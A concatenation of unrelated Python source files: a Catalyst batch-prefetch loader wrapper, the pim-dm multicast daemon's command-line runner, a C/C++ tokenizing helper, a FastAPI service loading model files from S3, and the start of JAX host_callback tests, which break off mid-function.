dataset = TensorDataset(X, y)
loader = DataLoader(dataset, batch_size=32, num_workers=1)
loader = BatchPrefetchLoaderWrapper(loader)
Minimal working example:
.. code-block:: python
import os
import torch
from torch.nn import functional as F
from torch.utils.data import DataLoader
from catalyst import dl, metrics
from catalyst.data.cv import ToTensor
from catalyst.contrib.datasets import MNIST
from catalyst.data import BatchPrefetchLoaderWrapper
class CustomRunner(dl.Runner):
def handle_batch(self, batch):
# model train/valid step
x, y = batch
y_hat = self.model(x.view(x.size(0), -1))
loss = F.cross_entropy(y_hat, y)
accuracy01 = metrics.accuracy(y_hat, y, topk=(1, ))
self.batch_metrics.update(
{"loss": loss, "accuracy01": accuracy01}
)
if self.is_train_loader:
self.engine.backward(loss)
self.optimizer.step()
self.optimizer.zero_grad()
model = torch.nn.Linear(28 * 28, 10)
optimizer = torch.optim.Adam(model.parameters(), lr=0.02)
batch_size=32
loaders = {
"train": DataLoader(
MNIST(
os.getcwd(),
train=True,
download=True,
transform=ToTensor()
),
batch_size=batch_size),
"valid": DataLoader(
MNIST(
os.getcwd(),
train=False,
download=True,
transform=ToTensor()
),
batch_size=batch_size),
}
loaders = {
k: BatchPrefetchLoaderWrapper(v) for k, v in loaders.items()
}
runner = CustomRunner()
# model training
runner.train(
model=model,
optimizer=optimizer,
loaders=loaders,
logdir="./logs",
num_epochs=5,
verbose=True,
load_best_on_end=True,
)
"""
def __init__(self, loader: DataLoader, num_prefetches: int = None):
"""Loader wrapper. Prefetches specified number of batches on the GPU.
Args:
loader: torch dataloader.
num_prefetches: number of batches to prefetch on the GPU.
"""
super().__init__(loader)
self.num_prefetches = num_prefetches or 1
def __iter__(self):
"""Iterator.
Returns:
iterator object
"""
return _prefetch_loader(self.origin, self.num_prefetches)
__all__ = ["ILoaderWrapper", "BatchLimitLoaderWrapper", "BatchPrefetchLoaderWrapper"]
|
Run.py | #!/usr/bin/env python3
import os
import sys
import time
import glob
import socket
import argparse
import threading
import traceback
import _pickle as pickle
from prettytable import PrettyTable
from pimdm import Main
from pimdm.tree import pim_globals
from pimdm.daemon.Daemon import Daemon
VERSION = "1.3.1"
def client_socket(data_to_send, print_output=True):
# Create a UDS socket
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
# Connect the socket to the port where the server is listening
server_address = pim_globals.DAEMON_SOCKET.format(pim_globals.MULTICAST_TABLE_ID)
#print('connecting to %s' % server_address)
try:
sock.connect(server_address)
sock.sendall(pickle.dumps(data_to_send))
data_rcv = sock.recv(1024 * 256)
if data_rcv:
if print_output:
print(pickle.loads(data_rcv))
else:
return pickle.loads(data_rcv)
except socket.error:
pass
finally:
#print('closing socket')
sock.close()
class MyDaemon(Daemon):
def run(self):
Main.main()
server_address = pim_globals.DAEMON_SOCKET.format(pim_globals.MULTICAST_TABLE_ID)
# Make sure the socket does not already exist
try:
os.unlink(server_address)
except OSError:
if os.path.exists(server_address):
raise
# Create a UDS socket
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
# Bind the socket to the port
sock.bind(server_address)
# Listen for incoming connections
sock.listen(1)
while True:
try:
connection, client_address = sock.accept()
data = connection.recv(256 * 1024)
print(sys.stderr, 'sending data back to the client')
print(pickle.loads(data))
args = pickle.loads(data)
if 'ipv4' not in args and 'ipv6' not in args or not (args.ipv4 or args.ipv6):
args.ipv4 = True
args.ipv6 = False
if 'list_interfaces' in args and args.list_interfaces:
connection.sendall(pickle.dumps(Main.list_enabled_interfaces(ipv4=args.ipv4, ipv6=args.ipv6)))
elif 'list_neighbors' in args and args.list_neighbors:
connection.sendall(pickle.dumps(Main.list_neighbors(ipv4=args.ipv4, ipv6=args.ipv6)))
elif 'list_state' in args and args.list_state:
connection.sendall(pickle.dumps(Main.list_state(ipv4=args.ipv4, ipv6=args.ipv6)))
elif 'add_interface' in args and args.add_interface:
Main.add_pim_interface(args.add_interface[0], False, ipv4=args.ipv4, ipv6=args.ipv6)
connection.shutdown(socket.SHUT_RDWR)
elif 'add_interface_sr' in args and args.add_interface_sr:
Main.add_pim_interface(args.add_interface_sr[0], True, ipv4=args.ipv4, ipv6=args.ipv6)
connection.shutdown(socket.SHUT_RDWR)
elif 'add_interface_igmp' in args and args.add_interface_igmp:
Main.add_membership_interface(interface_name=args.add_interface_igmp[0], ipv4=True, ipv6=False)
connection.shutdown(socket.SHUT_RDWR)
elif 'add_interface_mld' in args and args.add_interface_mld:
Main.add_membership_interface(interface_name=args.add_interface_mld[0], ipv4=False, ipv6=True)
connection.shutdown(socket.SHUT_RDWR)
elif 'remove_interface' in args and args.remove_interface:
Main.remove_interface(args.remove_interface[0], pim=True, ipv4=args.ipv4, ipv6=args.ipv6)
connection.shutdown(socket.SHUT_RDWR)
elif 'remove_interface_igmp' in args and args.remove_interface_igmp:
Main.remove_interface(args.remove_interface_igmp[0], membership=True, ipv4=True, ipv6=False)
connection.shutdown(socket.SHUT_RDWR)
elif 'remove_interface_mld' in args and args.remove_interface_mld:
Main.remove_interface(args.remove_interface_mld[0], membership=True, ipv4=False, ipv6=True)
connection.shutdown(socket.SHUT_RDWR)
elif 'list_instances' in args and args.list_instances:
connection.sendall(pickle.dumps(Main.list_instances()))
elif 'stop' in args and args.stop:
Main.stop()
connection.shutdown(socket.SHUT_RDWR)
break
elif 'test' in args and args.test:
Main.test(args.test[0], args.test[1])
connection.shutdown(socket.SHUT_RDWR)
elif 'config' in args and args.config:
Main.set_config(args.config[0])
connection.shutdown(socket.SHUT_RDWR)
elif 'get_config' in args and args.get_config:
connection.sendall(pickle.dumps(Main.get_config()))
elif 'drop' in args and args.drop:
Main.drop(args.drop[0], int(args.drop[1]))
except Exception:
connection.shutdown(socket.SHUT_RDWR)
traceback.print_exc()
finally:
# Clean up the connection
connection.close()
sock.close()
def main():
"""
Entry point for PIM-DM
"""
parser = argparse.ArgumentParser(description='PIM-DM protocol', prog='pim-dm')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-start", "--start", action="store_true", default=False, help="Start PIM")
group.add_argument("-stop", "--stop", action="store_true", default=False, help="Stop PIM")
group.add_argument("-restart", "--restart", action="store_true", default=False, help="Restart PIM")
group.add_argument("-li", "--list_interfaces", action="store_true", default=False, help="List All PIM Interfaces. "
"Use -4 or -6 to specify IPv4 or IPv6 interfaces.")
group.add_argument("-ln", "--list_neighbors", action="store_true", default=False, help="List All PIM Neighbors. "
"Use -4 or -6 to specify IPv4 or IPv6 PIM neighbors.")
group.add_argument("-ls", "--list_state", action="store_true", default=False, help="List IGMP/MLD and PIM-DM state machines."
" Use -4 or -6 to specify IPv4 or IPv6 state respectively.")
group.add_argument("-instances", "--list_instances", action="store_true", default=False,
help="List running PIM-DM daemon processes.")
group.add_argument("-mr", "--multicast_routes", action="store_true", default=False, help="List Multicast Routing table. "
"Use -4 or -6 to specify IPv4 or IPv6 multicast routing table.")
group.add_argument("-ai", "--add_interface", nargs=1, metavar='INTERFACE_NAME', help="Add PIM interface. "
"Use -4 or -6 to specify IPv4 or IPv6 interface.")
group.add_argument("-aisr", "--add_interface_sr", nargs=1, metavar='INTERFACE_NAME', help="Add PIM interface with State Refresh enabled. "
"Use -4 or -6 to specify IPv4 or IPv6 interface.")
group.add_argument("-aiigmp", "--add_interface_igmp", nargs=1, metavar='INTERFACE_NAME', help="Add IGMP interface")
group.add_argument("-aimld", "--add_interface_mld", nargs=1, metavar='INTERFACE_NAME', help="Add MLD interface")
group.add_argument("-ri", "--remove_interface", nargs=1, metavar='INTERFACE_NAME', help="Remove PIM interface. "
"Use -4 or -6 to specify IPv4 or IPv6 interface.")
group.add_argument("-riigmp", "--remove_interface_igmp", nargs=1, metavar='INTERFACE_NAME', help="Remove IGMP interface")
group.add_argument("-rimld", "--remove_interface_mld", nargs=1, metavar='INTERFACE_NAME', help="Remove MLD interface")
group.add_argument("-v", "--verbose", action="store_true", default=False, help="Verbose (print all debug messages)")
group.add_argument("-t", "--test", nargs=2, metavar=('ROUTER_NAME', 'SERVER_LOG_IP'), help="Tester... send log information to SERVER_LOG_IP. Set the router name to ROUTER_NAME")
group.add_argument("-config", "--config", nargs=1, metavar='CONFIG_FILE_PATH', type=str,
help="File path for configuration file.")
group.add_argument("-get_config", "--get_config", action="store_true", default=False,
help="Get configuration file of live daemon.")
#group.add_argument("-drop", "--drop", nargs=2, metavar=('INTERFACE_NAME', 'PACKET_TYPE'), type=str)
group.add_argument("--version", action='version', version='%(prog)s ' + VERSION)
group_ipversion = parser.add_mutually_exclusive_group(required=False)
group_ipversion.add_argument("-4", "--ipv4", action="store_true", default=False, help="Setting for IPv4")
group_ipversion.add_argument("-6", "--ipv6", action="store_true", default=False, help="Setting for IPv6")
group_vrf = parser.add_argument_group()
group_vrf.add_argument("-mvrf", "--multicast_vrf", nargs=1, default=[pim_globals.MULTICAST_TABLE_ID],
metavar='MULTICAST_VRF_NUMBER', type=int,
help="Define multicast table id. This can be used on -start to explicitly start the daemon"
" process on a given vrf. It can also be used with the other commands "
"(for example add, list, ...) for setting/getting information on a given daemon"
" process")
group_vrf.add_argument("-uvrf", "--unicast_vrf", nargs=1, default=[pim_globals.UNICAST_TABLE_ID],
metavar='UNICAST_VRF_NUMBER', type=int,
help="Define unicast table id for getting unicast information (RPF checks, RPC costs, ...). "
"This information can only be defined at startup with -start command")
args = parser.parse_args()
#print(parser.parse_args())
# This script must be run as root!
if os.geteuid() != 0:
sys.exit('PIM-DM must be run as root!')
if args.list_instances:
pid_files = glob.glob("/tmp/Daemon-pim*.pid")
t = PrettyTable(['Instance PID', 'Multicast VRF', 'Unicast VRF'])
for pid_file in pid_files:
d = MyDaemon(pid_file)
pim_globals.MULTICAST_TABLE_ID = pid_file[15:-4]
if not d.is_running():
continue
t_new = client_socket(args, print_output=False)
t.add_row(t_new.split("|"))
print(t)
return
pim_globals.MULTICAST_TABLE_ID = args.multicast_vrf[0]
pim_globals.UNICAST_TABLE_ID = args.unicast_vrf[0]
daemon = MyDaemon(pim_globals.DAEMON_PROCESS_FILE.format(pim_globals.MULTICAST_TABLE_ID))
if args.start:
print("start")
daemon.start()
sys.exit(0)
elif args.stop:
client_socket(args)
daemon.stop()
sys.exit(0)
elif args.restart:
daemon.restart()
sys.exit(0)
elif args.config:
try:
from pimdm import Config
args.config[0] = os.path.abspath(args.config[0])
[pim_globals.MULTICAST_TABLE_ID, pim_globals.UNICAST_TABLE_ID] = Config.get_vrfs(args.config[0])
daemon = MyDaemon(pim_globals.DAEMON_PROCESS_FILE.format(pim_globals.MULTICAST_TABLE_ID))
if not daemon.is_running():
x = threading.Thread(target=daemon.start, args=())
x.start()
x.join()
while not daemon.is_running():
time.sleep(1)
except ModuleNotFoundError:
print("PYYAML needs to be installed. Execute \"pip3 install pyyaml\"")
sys.exit(0)
except ImportError:
print("PYYAML needs to be installed. Execute \"pip3 install pyyaml\"")
sys.exit(0)
elif args.verbose:
os.system("tail -f {}".format(pim_globals.DAEMON_LOG_STDOUT_FILE.format(pim_globals.MULTICAST_TABLE_ID)))
sys.exit(0)
elif args.multicast_routes:
if args.ipv4 or not args.ipv6:
os.system("ip mroute show table " + str(pim_globals.MULTICAST_TABLE_ID))
elif args.ipv6:
os.system("ip -6 mroute show table " + str(pim_globals.MULTICAST_TABLE_ID))
sys.exit(0)
elif not daemon.is_running():
print("PIM-DM is not running")
parser.print_usage()
sys.exit(0)
client_socket(args)
if __name__ == "__main__":
main()
|
simple_tokenize.py | # Converts C/C++ files flatly into their tokens
import tokenizer.main as tokenizer
import helpers.common as common
import helpers.io as io
from multiprocessing import Process
def doAssignment(students, assign, helpers):
helpers.printf("tokenizing '{}' in parellel...\n".format(assign.name))
# for each student
for student in students:
# for each specificied file
files = assign.args["files"]
for filename in files:
path = helpers.getAssignmentPath(student, assign.name, filename)
if path != None:
# tokenize the file
result = tokenizer.simple(path)
# write the result
safeFilename = common.makeFilenameSafe(filename) + "tokenized.txt"
helpers.writeToPreprocessed(result, student, assign.name, safeFilename)
# all done!
helpers.printf("Finished '{}'!\n".format(assign.name))
def run(students, assignments, args, helpers):
# threads to join
threads = []
# for each assignment
for assign in assignments:
t = Process(target=doAssignment, args=(students, assign, helpers))
threads.append(t)
t.start()
# join then
for t in threads:
t.join()
# all done here
return True |
server.py | import uvicorn
from fastapi import FastAPI
from pydantic import BaseModel
import os
import logging
import json
import time
from threading import Thread
from multiprocessing import Process, Pool
from functools import partial
import boto3
import botocore
import sys
import cache
class LoadMessage(BaseModel):
file_type: str
file_path: str
file_name: list = []
class LoadRequest(BaseModel):
message: LoadMessage = None
app = FastAPI()
# Mandatory variables in envirnment
MANDATORY_ENV_VARS = {
'LOCAL_DATA_FOLDER': '/tmp/rs-data/',
'S3_BUCKET_DATA': 'aws-gcr-rs-sol-demo-ap-southeast-1-522244679887',
"RECORDS_PATH": 'news-open/system/item-data/meta-data/',
'REDIS_HOST': 'localhost',
'REDIS_PORT': 6379,
'LOADER_PORT': 5000
}
item_records = 'item_records_dict'
action_model = 'model.tar.gz'
def xasync(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
@app.get('/loader/status', tags=["monitoring"])
def status():
logging.info('Collecting status information from server & plugin...')
return {
'env': MANDATORY_ENV_VARS,
'redis': rCache.connection_status()
}
@app.get('/ping', tags=["monitoring"])
def ping():
logging.info('Processing default request...')
return {'result': 'ping'}
@app.post('/loader/notice', tags=["loader-service"])
def notice(loadRequest: LoadRequest):
logging.info('Start loader->process()...')
loader_message = loadRequest.message
file_type = loader_message.file_type
file_path = loader_message.file_path
file_list = loader_message.file_name
logging.info('file type:{}, file_path:{}, file_list:{}'.format(
file_type, file_path, file_list))
if not os.path.exists(MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER']):
logging.info("the local path {} is not existed".format(MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER']))
os.mkdir(MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER'])
if file_type == 'inverted-list':
for file in file_list:
init_single_pickle_data(file_path, file)
else:
for file in file_list:
if file_type == 'action-model':
init_data_file(file_path, file)
elif file_type == 'vector-index':
init_data_file(file_path, file)
elif file_type == 'embedding':
init_data_file(file_path, file)
elif file_type == 'feature_model':
init_data_file(file_path, file)
time.sleep(10)
notice_service_to_reload(
file_type, MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER'], file_list)
return json.dumps({'result': 'success'}), 200, {'ContentType': 'application/json'}
def init_single_pickle_data(path, file):
download_file_from_s3(MANDATORY_ENV_VARS['S3_BUCKET_DATA'], path, file, MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER'])
def init_data_file(path, file):
download_file_from_s3(MANDATORY_ENV_VARS['S3_BUCKET_DATA'], path, file, MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER'])
def download_file_from_s3(bucket, path, file, dest_folder):
logging.info('Download file - %s from s3://%s/%s ... ', file, bucket, path)
# Using default session
s3client = boto3.client('s3')
try:
s3client.download_file(bucket, path+file, dest_folder+file)
except botocore.exceptions.ClientError as error:
raise error
except botocore.exceptions.ParamValidationError as error:
raise ValueError(
'The parameters you provided are incorrect: {}'.format(error))
logging.info(
'Download file - %s from s3://%s/%s ... was success', file, bucket, path)
return dest_folder+file
def notice_service_to_reload(type, file_path, file_list):
logging.info('type=%s, file_path=%s, file_list=%s',
type, file_path, file_list)
data = {
'file_type': type,
'file_path': file_path,
'file_list': str(file_list)
}
rCache.load_data_into_stream(type, data)
def init():
# Check out environments
for var in MANDATORY_ENV_VARS:
if var not in os.environ:
logging.error(
"Mandatory variable {%s} is not set, using default value {%s}.", var, MANDATORY_ENV_VARS[var])
else:
MANDATORY_ENV_VARS[var] = os.environ.get(var)
# Initial redis connection
global rCache
rCache = cache.RedisCache(
host=MANDATORY_ENV_VARS['REDIS_HOST'], port=MANDATORY_ENV_VARS['REDIS_PORT'])
logging.info('redis status is {}'.format(rCache.connection_status()))
if __name__ == "__main__":
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
init()
uvicorn.run(app, host="0.0.0.0", port=MANDATORY_ENV_VARS['LOADER_PORT'])
|
host_callback_test.py | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import itertools
import logging
import os
import re
import threading
import time
from typing import Callable, Optional, Sequence
import unittest
from unittest import skip, SkipTest
from absl.testing import absltest
from absl.testing import parameterized
import jax
from jax import ad_checkpoint
from jax import core
from jax.config import config
from jax import dtypes
from jax.experimental import host_callback as hcb
from jax.experimental import PartitionSpec as P
from jax.experimental import maps
from jax.experimental import pjit
from jax import lax
from jax import numpy as jnp
from jax._src import test_util as jtu
from jax import tree_util
from jax._src.lib import xla_client
from jax._src.lib import xla_bridge
xops = xla_client.ops
import numpy as np
config.parse_flags_with_absl()
FLAGS = config.FLAGS
class _TestingOutputStream(object):
"""Use as `output_stream` for tests."""
def __init__(self):
self._output = []
self._test_method_name = None
def write(self, what: str) -> None:
print(f"output_stream[{self._test_method_name}]: {what}", end="")
self._output.append(what)
@property
def output(self):
return "".join(self._output)
@property
def output_sorted_by_device(self):
# Assume that the output is a sequence of strings including metadata
# and data, with metadata containing `device: xxx`
by_device = [] # each element is a pair (device, str_list)
for s in self._output:
m = re.match(r".*device: (\S+)", s)
if m:
by_device.append((m.group(1), []))
assert by_device, f"output does not include 'device:': {self._output}"
by_device[-1][1].append(s)
sorted_by_device = sorted(by_device, key=lambda x: x[0])
return "\n".join(itertools.chain(*[s[1] for s in sorted_by_device]))
def __str__(self):
return "TestingOutputStream"
def reset(self):
self._output = []
testing_stream = _TestingOutputStream()
def fun1(a):
"""Function used for several `id_tap` tests."""
y = hcb.id_print(a * 2., what="a * 2", output_stream=testing_stream)
y = hcb.id_print(y * 3., what="y * 3", output_stream=testing_stream, result=y)
return y ** 2 # Some computation to make the gradient interesting
def fun1_equiv(a): # Numerical equivalent of fun1
return (a * 2.) ** 2
def maybe_print(do_print: bool, arg, what: str, tap_with_device: Optional[bool] = False):
"""Conditionally print on testing_string"""
if do_print:
return hcb.id_print(arg, what=what,
output_stream=testing_stream, tap_with_device=tap_with_device)
else:
return arg
def local_devices():
# Tests require using not more than 2 devices.
return jax.local_devices()[:2]
ignore_jit_of_pmap_warning = partial(
jtu.ignore_warning, message=".*jit-of-pmap.*")
def assertMultiLineStrippedEqual(tst: jtu.JaxTestCase,
expected: str, what: str):
"""A variant that preprocesses the string to eliminate non-determinism in
floating point values, and several uninteresting id_tap primitive params.
"""
# Sometimes we get floating points in the output; we round them
def repl_floats(match_group):
matched = match_group.group(0)
if matched == ".": return matched
x = np.around(float(matched), decimals=2)
return f"{x:.2f}"
what = re.sub(r"\-?\d+\.[\-\def]*", repl_floats, what)
what = re.sub(r"output_stream=[^\]\n,]*,?", "", what)
what = re.sub(r"threshold=[^\]\n,]*,?", "", what)
what = re.sub(r"bwd=[^\]\n]*", "", what)
what = re.sub(r"out_trees=[^\]\n]*", "", what)
what = re.sub(r"fwd_jaxpr_thunk=[^\]\n]*", "", what)
what = re.sub(r"jvp_jaxpr_thunk=[^\]\n]*", "", what)
# Empty lines
what = re.sub(r"^\s*\n", "", what, flags=re.MULTILINE)
def repl_func(match_group):
matched = match_group.group(3)
if "function _print_consumer" in matched:
return match_group.group(1) + "=_print"
else:
return match_group.group(1) + "=..."
what = re.sub(r"((tap_func_)|(callback))=([^\]\n,]*),?", repl_func, what)
tst.assertMultiLineStrippedEqual(expected, what)
def helper_set_hlo_dump():
flags_str = os.getenv("XLA_FLAGS", "")
import shutil
dump_dir = "/tmp/xla_dump"
os.environ["XLA_FLAGS"] = f"{flags_str} --xla_dump_to={dump_dir}"
if os.path.isdir(dump_dir):
logging.warning("Deleting old XLA dump directory %s", dump_dir)
shutil.rmtree(dump_dir)
logging.warning("Setting XLA dump directory %s", dump_dir)
# Clear any cached backends so new CPU backend will pick up the env var.
xla_bridge.get_backend.cache_clear()
def helper_print_optimized_hlo(fun, *args):
backend = xla_bridge.get_backend(platform=jtu.device_under_test())
c = jax.xla_computation(fun, backend=backend.platform)(*args)
print(re.sub(r", metadata.*", "",
backend.compile(c).hlo_modules()[0].to_string()))
def helper_log_ir(name,
f_jax,
*args,
num_partitions=None,
strip_metadata=False):
print(f"Jaxpr[{name}]: {jax.make_jaxpr(f_jax)(*args)}")
jax_comp = jax.xla_computation(f_jax, backend=jtu.device_under_test())(*args)
print(f"HLO[{name}]: {jax_comp.as_hlo_text()}")
backend = xla_bridge.get_backend()
if num_partitions is not None:
num_replicas = 1
device_assignment = np.array(jax.devices()[:num_partitions * num_replicas])
device_assignment = np.reshape(device_assignment, (-1, num_partitions))
use_spmd_partitioning = num_partitions > 1
compile_options = xla_bridge.get_compile_options(
num_replicas=num_replicas,
num_partitions=num_partitions,
device_assignment=device_assignment,
use_spmd_partitioning=use_spmd_partitioning,
)
else:
compile_options = None
jax_optimized_hlo = backend.compile(
jax_comp, compile_options).hlo_modules()[0].to_string()
if strip_metadata:
jax_optimized_hlo = re.sub(r", metadata.*", "", jax_optimized_hlo)
print(f"Optimized HLO[{name}] for "
f"platform {backend.platform}: {jax_optimized_hlo}")
prev_xla_flags = None
def setUpModule():
global prev_xla_flags
# This will control the CPU devices. On TPU we always have 2 devices
prev_xla_flags = jtu.set_host_platform_device_count(2)
# Reset to previous configuration in case other test modules will be run.
def tearDownModule():
prev_xla_flags()
def assertMultiDeviceOutputEqual(tst: jtu.JaxTestCase,
expected_2CPUs: str):
"""Check that the multi-device output is equal to the expected.
The tests run with 2 devices if available, otherwise 1 device.
We adjust the expected output here for 1 device.
Args:
expected_2CPUs: the expected output for 2 CPUs. If there is only
one device, this is trimmed to the first device. If the current
device_under_test is not a CPU, then we change the names
"""
expected = expected_2CPUs
if len(local_devices()) == 1:
start_device_1 = expected.find('device: cpu:1')
if start_device_1 >= 0:
expected = expected[0:start_device_1]
def replace_device_name(m) -> str:
return str(local_devices()[int(m.group(1))])
expected = re.sub(r'cpu:(\d+)', replace_device_name, expected)
what = testing_stream.output_sorted_by_device
return assertMultiLineStrippedEqual(tst, expected, what)
class HostCallbackTapTest(jtu.JaxTestCase):
def setUp(self):
super().setUp()
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
testing_stream.reset()
testing_stream._test_method_name = self._testMethodName
self.old_flags = os.getenv("XLA_FLAGS", "")
def tearDown(self) -> None:
if os.getenv("XLA_FLAGS") != self.old_flags:
os.environ["XLA_FLAGS"] = self.old_flags
xla_bridge.get_backend.cache_clear()
hcb.barrier_wait("HostCallbackTapTest.tearDown")
super().tearDown()
def test_tap_eval(self):
self.assertAllClose((5. * 2.) ** 2, fun1(5.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: a * 2
10.00
what: y * 3
30.00""", testing_stream.output)
def test_tap_with_tuple_results(self):
def func2(x):
x1, y1 = hcb.id_print((x * 2., x * 3.), output_stream=testing_stream)
return x1 + y1
self.assertEqual(3. * (2. + 3.), func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( 6.00 9.00 )""", testing_stream.output)
def test_tap_with_dict_results(self):
def func2(x):
res = hcb.id_print(dict(a=x * 2., b=x * 3.), output_stream=testing_stream)
return res["a"] + res["b"]
self.assertEqual(3. * (2. + 3.), func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
{ a=6.00 b=9.00 }""", testing_stream.output)
def test_tap_with_result(self):
def func2(x):
x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
output_stream=testing_stream)
return x1
self.assertEqual(3. * 4., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( 6.00 9.00 )""", testing_stream.output)
def test_tap_with_result_no_arg(self):
def tap_func(arg, transforms):
testing_stream.write(f"called tap_func with {arg}")
def func2(x):
x1 = hcb.id_tap(tap_func, None, result=x)
return x1
self.assertEqual(3., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "called tap_func with None",
testing_stream.output)
def test_tap_result_unused(self):
def tap_func(arg, transforms):
testing_stream.write(f"called tap_func with {arg}")
def func2(x):
hcb.id_tap(tap_func, None)
return x
self.assertEqual(3., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "called tap_func with None",
testing_stream.output)
def test_tap_with_device(self):
def func2(x):
x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
output_stream=testing_stream,
tap_with_device=True)
return x1
self.assertEqual(3. * 4., func2(3.))
hcb.barrier_wait()
assertMultiDeviceOutputEqual(self, """
device: cpu:0
( 6.00 9.00 )""")
def test_tap_eval_exception(self):
if not FLAGS.jax_host_callback_outfeed:
raise SkipTest("TODO: implement error handling for customcall")
# Simulate a tap error
def tap_err(*args, **kwargs):
raise ValueError("Some user message")
def func(x):
x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
x2 = hcb.id_tap(tap_err, x1 + 1)
x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
return x3
with self.assertRaisesRegex(
hcb.CallbackException,
re.compile("There were exceptions during callback processing. Last one was:.*"
"ValueError: Some user message", re.DOTALL)):
func(0)
hcb.barrier_wait()
# We should have received everything before the error
assertMultiLineStrippedEqual(self, """
what: x1
1
what: x3
3""", testing_stream.output)
def test_tap_empty(self):
"""Tap empty arrays."""
hcb.id_print((), output_stream=testing_stream)
hcb.id_print((1., np.ones((2, 0))), what="second", output_stream=testing_stream)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( )
what: second
( 1.00 [] )""", testing_stream.output)
def test_tap_jit_simple(self):
jit_fun1 = jax.jit(lambda x: 3. * hcb.id_print(
2. * x, what="here", output_stream=testing_stream))
self.assertAllClose(6. * 5., jit_fun1(5.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: here
10.00""", testing_stream.output)
def test_tap_jit_no_invars(self):
def func(): # jitted function does not take arguments
return hcb.id_print(42, output_stream=testing_stream)
self.assertAllClose(42, jax.jit(func)())
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
def test_tap_jit_multiple_invars(self):
def func(x1, x2):
return hcb.id_print(x1 + x2, output_stream=testing_stream)
self.assertAllClose(42, jax.jit(func)(40, 2))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
def test_tap_jit_constant(self):
def func(x):
return hcb.id_print(42, result=x, output_stream=testing_stream)
self.assertAllClose(5, jax.jit(func)(5))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
def test_tap_jit_sequence1(self):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
return hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
logging.info("%s: %s", self._testMethodName,
jax.make_jaxpr(func)(1))
logging.info("%s: %s", self._testMethodName,
jax.xla_computation(func, backend=jtu.device_under_test())(1).as_hlo_text())
self.assertEqual(2, jax.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2""", testing_stream.output)
def test_tap_jit2(self):
"""A sequence of JIT."""
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
return x2
self.assertEqual(2, jax.jit(func)(1))
self.assertEqual(11, jax.jit(func)(10))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: 1
10
where: 2
11""", testing_stream.output)
def test_tap_jit_result_unused(self):
"""We can id_print even if we don't use the result."""
def func(x):
hcb.id_print(x, where="1", output_stream=testing_stream)
hcb.id_print(x + 1, where="2", output_stream=testing_stream)
return x + 1
self.assertEqual(2, jax.jit(func)(1))
self.assertEqual(11, jax.jit(func)(10))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: 1
10
where: 2
11""", testing_stream.output)
def test_tap_jit_nested(self):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
def func_nested(x):
x2 = hcb.id_print(x + 1, where="nested", output_stream=testing_stream)
return x2
x3 = jax.jit(func_nested)(x1)
return hcb.id_print(x3 + 1, where="3", output_stream=testing_stream)
self.assertEqual(3, jax.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: nested
2
where: 3
3""", testing_stream.output)
def test_tap_jit_devices(self):
"""Running on multiple devices."""
logging.info("%s: has devices %s", self._testMethodName, local_devices())
def func(x, device_id):
x1 = hcb.id_print(x, dev=str(device_id), output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, dev=str(device_id), output_stream=testing_stream)
return x2
for d in local_devices():
self.assertEqual(112, jax.jit(func, device=d, static_argnums=1)(111, d.id))
hcb.barrier_wait()
logging.info("%s: found output %s", self._testMethodName,
testing_stream.output)
self.assertEqual(
len(local_devices()), len(re.findall(r"111", testing_stream.output)))
self.assertEqual(
len(local_devices()), len(re.findall(r"112", testing_stream.output)))
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_pytree(self, with_jit=False):
def func(x, what=""):
"""Returns some pytrees depending on x"""
if what == "pair_1_x":
return (1, x)
elif what == "pair_x_2x":
return (x, 2 * x)
elif what == "dict":
return dict(a=2 * x, b=3 * x)
else:
